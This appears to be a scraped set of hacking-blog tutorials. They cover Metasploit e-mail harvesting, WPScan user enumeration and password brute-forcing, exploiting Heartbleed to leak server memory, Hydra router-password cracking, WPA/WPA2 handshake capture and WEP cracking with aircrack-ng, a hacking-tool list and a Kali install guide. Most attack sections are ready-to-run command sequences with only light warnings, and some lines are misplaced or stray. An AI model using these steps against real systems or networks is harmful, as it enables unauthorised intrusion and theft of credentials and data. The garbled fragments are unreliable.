Extract E-mails From A Website

Let’s say you want to extract e-mails from a website, legitimate or legal reason could be that you want e-mail addresses of persons from a website who you want to contact from a website.

There could be illegal uses also like if someone wants to hack the site he can extract all e-mails from the domain and try to hack these e-mail id’s to create a gateway into the site.

 

Extract E-mails From A Website

 

How To Extract E-mails From A Website :-

Requirements :-

  • A linux distribution preferably ‘Kali Linux‘.

The Process :-

We will be extracting e-mails with the help of  a module in the Metasploit Framework, Search Engine Domain Email Address Collector’. This module will use the top three search engines Google, Bing and Yahoo to create a list of e-mails from a domain.

So Let’s Get To It :-

  • Fire up the terminal and start up metasploit by typing : msfconsole.
  • Now let’s search the module by typing ‘search collector‘.
  • Type ‘use auxiliary/gather/search_email_collector to use the auxiliary’.
  • In this step we are going to set the target domain to use, type ‘set domain your-site.com.
  • Almost done now, just type ‘exploit‘ and e-mail addresses will start to show up.

That was all you needed to do to extract emails from a website. Enjoy..!!

Related :- Use A Single E-mail For Multiple Accounts On A Website

How To Scan A WordPress Site For Vulnerabilities

WordPress is the most popular open-source C. M. S. (Content Management System) with ‘N’ number of plugins & themes which could make it very fun to use. But sometimes these plugins and themes could cause security issues on our site as many of them are poorly coded. So in this tutorial we are going to discuss the ways on – How to scan a WordPress site for vulnerabilities and fixing it.

scan wordpress for vulnerabilities

Vulnerability scanner which we will be using for this tutorial is named ‘WPScan’ which is free to download and install. You can also use the almighty KALI Linux which pre-includes this tool and many more. If you don’t have KALI : GET IT FROM HERE.

So Let’s Get To It :-

WPScan works by scanning the installed themes & plugins on a given website and matching them to it’s ‘database’ of vulnerable plugins/themes. If a match is found it will show a few links to SecurityFocus’s CVE database where you can read more about the vulnerability.

Scan A Website :-

wpscan –url “http://example.com”

This command will check a given site and provide various information about the installation of wordpress, themes and plugins installed.

Scan Installed Plugins For Vulnerability :-

wpscan –url “http://example.com” –enumerate vp

After executing this command, WPScan will start to match the installed plugins from it’s database and upon finding a vulnerability it will show CVE (Common Vulnerabilities and Exposures) reference links.

Scan Installed Themes For Vulnerability :-

wpscan –url “http://example.com” –enumerate t

Like the command before this, it will scan for vulnerable themes and show the related CVE reference links.

Scan The Name Of WordPress Users :-

wpscan –url “http://example.com” –enumerate u

Using this command will show the name of users with access to the admin area (wordpress login) of a particular site.

Testing All At Once :-

wpscan –url “http://example.com” –enumerate u,vp,t

If you like, you can also test all the three things at once using this command.

Bruteforcing a Weak WordPress Password :-

This post is just about scanning for vulnerabilities so bruteforcing a password doesn’t need to be here but as this is part of WPScan, it needs a mention. A weak password is no less harmful (infact much harmful) than a vulnerable theme or plugin.

wpscan –url “website.com” –wordlist passwords.txt –username helge

For this command to work you also need to provide the path to a wordlist (a file with possible passwords). You can find number of them spread across the internet but i would recommend this one.

Don’t Miss :- How To Check Website For Vulnerabilities.

Securing The Site :-

When done with the scanning part you should focus on securing your site by removing the reported plugins and themes or update them (if available).

Note :- Do not simply rely on WPScan as it won’t notify you of 0-day (Zero-Day) exploits.

So, don’t waste time & start securing your site. Feedback and suggestions are welcome, feel free to comment.

Enjoy..!!

Also See :- How To Exploit The Heartbleed Bug.

Top 50 Hacking Tools That You Must Have

Whether you are a Penetration tester, a hacker or an aspiring newbie trying to learn Cyber Security, you must have a nice catalogue of tools to make your life easier. While these tools do make working simpler but cannot compensate for the vast amount of knowledge required in this field. Ethical hacking and online security involves a lot efforts. Many tools are used to test and keep software secure. The same tools can also be used by hackers for exploitation.

hacking-tools

A hacking tool is a computer program or software which helps a hacker to hack a computer system or a computer program.

 In this post i’m going to mention 50 different tools under 9 categories that your ‘Hack Lab’ must have. Most of the tools mentioned in this post are pre-included in Kali Linux which you can install to have them at once.
Intrusion Detection Systems :-
These are the tools you must have if you’re building a hack lab for penetration testing or for any security arrangement. They help you detect of any threats that might harm the system.
  • Snort
  • NetCop

Encryption Tools :-
While the above tools do identify any suspicious activity but they can’t protect your data, you need encryption tools for that.
  • TrueCrypt (The project has been shut down and no longer supported)
  • OpenSSH
  • Putty
  • OpenSSL
  • Tor
  • OpenVPN
  • Stunnel
  • KeePass


Port Scanners :-

The next big thing is Port Scanners, you can’t penetrate a network without knowing what services are running on what ports.
  • Nmap
  • Superscan
  • Angry IP Scanner


Packet Sniffers :-

These tools let you intercept traffic incoming/outgoing from the network.
  • Wireshark
  • Tcpdump
  • Ettercap
  • Dsniff
  • EtherApe

Traffic Monitoring :-
These tools let’s you monitor and analyze what is currently going on in a network.
  • Splunk
  • Nagios
  • P0f
  • Ngrep  


Vulnerability Exploitation :-

These are the hardcore tools that you will use after identifying the flaw or loop hole in the security of a network.
  • Metasploit (The Best)
  • Sqlmap
  • Sqlninja
  • Social Engineer Toolkit
  • NetSparker
  • BeEF
  • Dradis

Packet Crafting :-
Packet Crafting tools facilitate finding vulnerabilities within the firewall.
  • Hping
  • Scapy
  • Netcat
  • Yersinia
  • Nemesis
  • Socat

Password Crackers :-
These tools let you crack passwords a computer has stored in it or is transmitting over the network.
  • Ophcrack
  • Medusa
  • RainbowCrack
  • Wfuzz
  • Brutus
  • L0phtCrack
  • Fgdump
  • THC Hydra
  • John The Ripper
  • Aircrack
  • oclHashcat
  • Cain and Abel


Wireless Hacking :-

If a network have a Wi-fi access point then it can easily be broken into. Various encryption methods like WEP, WPA/WPA2  or even the latest WPS have some serious security flaws. These tools help you intrude much easily.
  • Aircrack-ng
  • Kismet
  • InSSIDer
  • KisMAC
These were some of the tools which must be in any Cyber Security Researcher’s arsenal.
So, What are you waiting for – Let the hacking begin..!!
Did I miss some other cool tools which must be in this list, do let me know in the comments.
Enjoy..!!

How To Exploit The Heartbleed Bug

On 07, April 2014 a patch was released for OpenSSL to fix a very controversial vulnerablility – The Heartbleed Bug. According to a report, over 500,000 servers were found to be vulnereable but more and more admins are now patching their machines and the numbers are decreasing steadily.
heartbleed

 

Affected servers are vulnerable to hacking (extraction of information such as user credential’s, cookies, server private keys, Personal Identification Info etc. from the memory). The bug is so big that major websites like Google, Facebook, Tumblr, Instagram, Yahoo, Pinterest etc. were also vulnerable. This exploit is in existence for more than 2 years without anyone’s attention.

In this post you’ll learn to exploit the Heartbleed bug for getting a buggy website’s OpenSSL to spill the contents of its memory and possibly give us the user’s credentials and other information.

Requirement :-
For this tutorial we will be using a great tool i.e. Metasploit Framework. It’s pre-included in Kali Linux.

metasploit


Steps To Follow :-

First of all, if you’ve haven’t updated your metasploit framework in quit a while i would recommend it doing now, open up a terminal window and type the following command :

set RHOSTS 192.168.1.169

  • msfupdate 
It could take a while for the framework to update. Once the update process is complete we are good to go.
Start the metasploit framework by typing :
  • msfconsole
Now we will search for the heartbleed exploit using inbuilt search function :
  • search heartbleed
Load up the auxilliary module by typing :
  • use auxiliary/scanner/ssl/openssl_heartbleed
The heartbleed module is now loaded. If you wish to find more information about the module, you may type :
  • info
This command reveals the options that we can set in order to use this module and a description of the module.
Now we have to set RHOST. RHOST is the ip address of the website which is vulnerable to the exploit.
  •  set RHOSTS 192.168.1.169 
  •  set verbose true 
It’s almost done now, just enter the following command :
  • run
If everything went as planned the server will leak about 64K bytes of what was in its memory. This could contain anything from username-password pairs to credit card numbers which is why this hack (along with pretty much all others) is very much illegal to actually try on a live website without the developer’s explicit consent.

Easiest Way To Find Vulnerablility (Bugs) In A Website

In this post we’re going to discuss an automated vulnerability discovery tool for websites – Uniscan. This tool is the creation of SourceForge Project and is written in perl language.
It scan websites and web applications for various security issues like SQLi, RFI, LFI, XSS etc.For this tutorial, we are going to use Kali Linux because Uniscan is preinstalled and it saves us a lot of hassle. If you don’t have kali linux installed or cannot figure out how to install it, I would recommend taking a look at my previous post – How To Install Kali Linux.Running and using Uniscan is quite simple, just open up a Terminal Window and type ‘uniscan‘ and the list of options and examples will be listed.

uniscan

 

Check Out : Easy Ways To Prevent DDOS Attacks

Scanning :-
In the image above under the Usage heading examples are given on using Uniscan, try the first option.

uniscan

The above example scans a single url for basic information.

Fingerprinting :-
With the option ‘j’ uniscan would fingerprint the server of the url. Server fingerprinting simply runs commands like ping, traceroute, nslookup, nmap on the server ip address and packs the results together.

uniscan

Another option is ‘g’ which does web based fingerprinting. It looks up specific urls.

uniscan

 

Search The Search Engines :-
Uniscan can also perform bing and google searches and store the result in a text file. The i option can be used for searching bing and o operator for google. To search bing for all domains hosted on a given ip address issue the following command :
uniscan
Replace the x’s with your target ip. The results are saved in a file called sites.txt which can be found at ‘/usr/share/uniscan’. They should ideally be saved in the home directory of the user or the working directory.
For searching google, use the following command :
uniscan
Use this tool carefully because google may block too many automated search queries.
As the internet is endless so are the possibilities of using this tool. So go and find those vulnerabilities on them websites.
Source
Enjoy..!!

Hacking Router Password Like A Pro

Most users nowadays purchase new routers and leave it to the default settings. BAD IDEA..!!.
Leaving your routers to default settings is bad because if it’s hacked (surely, sooner or later) by a malicious hacker, they would change your network settings so as to direct their traffic from your workstation while committing dirty deeds.Never mind the hackers, any Tom, Dick and Harry with a little computer processing power can get into your system easily.

In this post, we are going to discuss a brute forcing tool THC-Hydra, which can be used to crack router passwords.

 

thc-hydra

 

Requirements :-

  • Kali Linux ( If you don’t have it, install it from here.) 
Steps To Follow :-

If you’ve installed Kali Linux, you should now be fully loaded to continue :-
  • Open up a terminal window and type xhydra.
  • Enter 192.168.1.1 (Your Router Gateway, It could be different) as your target.
  • Use http-get as the method.
  • Define 80 in Port settings.
  • Select a password wordlist.(Don’t have one, download it from here.)
  • Click Start and the attack will begin.
The cracking time depends on the length and complexity of  the password used and also on the quality of wordlist.
Once cracked they can easily change your wifi passwords(no matter what encryption you use W.E.P., W.P.A., or W.P.A./2 with W.P.S.) or lock you out of your network, scary huh..!!
To prevent it from happening to you – use a password of more than 12 characters and don’t leave your router settings to default, change it to your preferences.
Enjoy..!!

How To Hack Wifi : Cracking WPA/WPA2 Encryption

How To Hack Wifi Passwords :-

How it is Cracked:

WPA-WPA2 are a special case when it comes to Wireless Network Cracking. The method used to crack them is named ‘Handshake’. What should we do to get the Handshake is fooling a Computer connected to the network we will crack. Then we will use a dictionary to crack the Handshake and get the Key. So, this means that to crack these networks we need:
  • A huge dictionary / wordlist – The bigger, the Better. (You can find searching the web using terms like: ‘Large WPA-WPA2 Cracking Wordlist’)
  • A PC with backtrack or kali linux installed. So, let’s go and crack that network:
Enter your wireless interface into monitor mode:

  • airmon-ng start wlan0
image_techno
Get the list of the networks available:
  • airodump-ng mon0
image_techno
Get info on a specific Network:
  • airodump-ng -c channel -w filename –bssid macaddrs mon0
(‘channel’ is the Network’s channel number) (‘filename’ is the name of the file that airodump-ng will save its data) (‘macaddrs’ is the Network’s MAC Address)
image_techno
Note that under the STATION Tab there is a MAC address. This means that there is someone connected to that network and this is his PC’s MAC address. To get the handshake we will kick him off and he will automatically reconnect to the network.
So, to kick him of and get the handshake, type at a new terminal:
  • aireplay-ng -1 0 -a bssid mon0
(where ‘bssid’ you must type the Network‘s MAC Address)
image_techno
When we successfully get the handshake, stop the proccess by hitting CTRL+C at the terminal that Airodump-ng is running. The handshake should be placed at your Home Folder.
To crack it type:
  • aircrack-ng -w dictionary /username/filename
(‘dictionary’ is the name/path of your dictionary) (‘username’ is your username – on Backtrack is ‘root’ by default) (‘filename’ is the captured WPA/WPA2 Handshake)
image_techno

Enjoy..!!

Ludo king hack

Cracking Wifi With Kali Linux (WEP Networks)

Before we start.

I would recommend you to Install Kali Linux on your PC.


Don’t Miss : How To Hack Wifi Passwords

Cracking WiFi (W.P.S BruteForce)

OR

Cracking WPA/WPA-2 Networks



WEP Cracking.

WEP is very easy and fast to crack. Here are the steps:-
  • Put your Wireless Interface into Monitor Mode:
                airmon-ng start wlan0
image_techno
  • Get Info from the Available Networks:
                airodump-ng mon0
image_techno
  • Select one network that uses WEP encryption. In our Example the network is named SKIDHACKER. Now, get more info on the specific Network:
                     airodump-ng -c channel -w filetosave –bssid macaddrs mon0
(‘channel’ is the Channel Number) (‘filetosave’ is the file that airodump-ng will save its data) (‘macaddrs’ is the MAC Address of the Network) —> All this info is provided by the command used in Step 2.
  • To boost the proccedure type on a new terminal:
               aireplay-ng -1 0 -a bssid mon0
(‘bssid’ is the MAC Address of the Network)
image_techno
  • When this command is done, capture packets by typing:
                    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b bssid mon0
(‘bssid’ is the Networks MAC Address)
image_techno
  • When the above command gets about 20.000 – 30.000 packets you are now able to crack the network by typing:
                    aircrack-ng filename.cap
(where instead of ‘filename’.cap you enter the file that aireplay-ng saved at your current directory – This file is named wep-x.cap –x is a number, starting from ’01′, then ’02′ etc….–) (Instead of the ‘wep-01.cap’ you can use the ‘wep*.cap’ as in the example to ‘Auto-Select’ the file)
image_techno
  • When aircrack-ng finds the key it will display something like:
                    KEY FOUND! [ 12:34:56:78:90 ]
(In this example our key is ’1234567890′)
  • When Finished, make sure you put your wireless interface back to original Mode by typing:
                    airmon-ng stop wlan0Enjoy..!!

How To Install Kali Linux Easily

Hard Disk Installation Procedure :-

How To Install Kali Linux Easily

image_techno

Kali Linux Installation Requirements

Installing Kali Linux on your computer is an easy process. First, you’ll need compatible computer hardware. Kali is supported on i386, amd64, and ARM (both armel and armhf) platforms. The hardware requirements are minimal as listed below, although better hardware will naturally provide better performance. The i386 images have a default PAE kernel, so you can run them on systems with over 4GB of RAM. Download Kali Linux and either burn the ISO to DVD, or prepare a USB stick with Kali Linux Live as the installation medium. If you do not have a DVD drive or USB port on your computer, check out the Kali Linux Network Install.

Installation Prerequisites

  • A minimum of 8 GB disk space for the Kali Linux install.
  • For i386 and amd64 architectures, a minimum of 512MB RAM.
  • CD-DVD Drive / USB boot support

Preparing for the Installation

  • Burn The Kali Linux ISO to DVD or Image Kali Linux Live to USB.
  • Ensure that your computer is set to boot from CD / USB in your BIOS.

How To Install Kali Linux

  • To start your installation, boot with your chosen installation medium. You should be greeted with the Kali Boot screen. Choose either Graphical or Text-Mode install.
How To Install Kali Linux Easily

  • Select your preferred language and then your country location. You’ll also be prompted to configure your keyboard with the appropriate key-map.
  • The installer will copy the image to your hard disk, probe your network interfaces, and then prompt you to enter a host-name for your system.In the example below, we’ve entered “kali” as our hostname.

 

  • Enter a robust password for the root account.

How To Install Kali Linux Easily

  • Next, set your time zone.
  • The installer will now probe your disks and offer you four choices. In our example, we’re using the entire disk on our computer and not configuring LVM (logical volume manager). Experienced users can use the “Manual” partitioning method for more granular configuration options.
  • Next, you’ll have one last chance to review your disk configuration before the installer makes irreversible changes. After you click Continue, the installer will go to work and you’ll have an almost finished installation.
  • Configure network mirrors. Kali uses a central repository to distribute applications. You’ll need to enter any appropriate proxy information as needed.
NOTE! If you select “NO” in this screen, you will NOT be able to install packages from Kali repositories.
  • Next, install GRUB.
  • How To Install Kali Linux Easily

  • Finally, click Continue to reboot into your new Kali installation.

 

 Enjoy..!!

How To Install Kali Linux Easily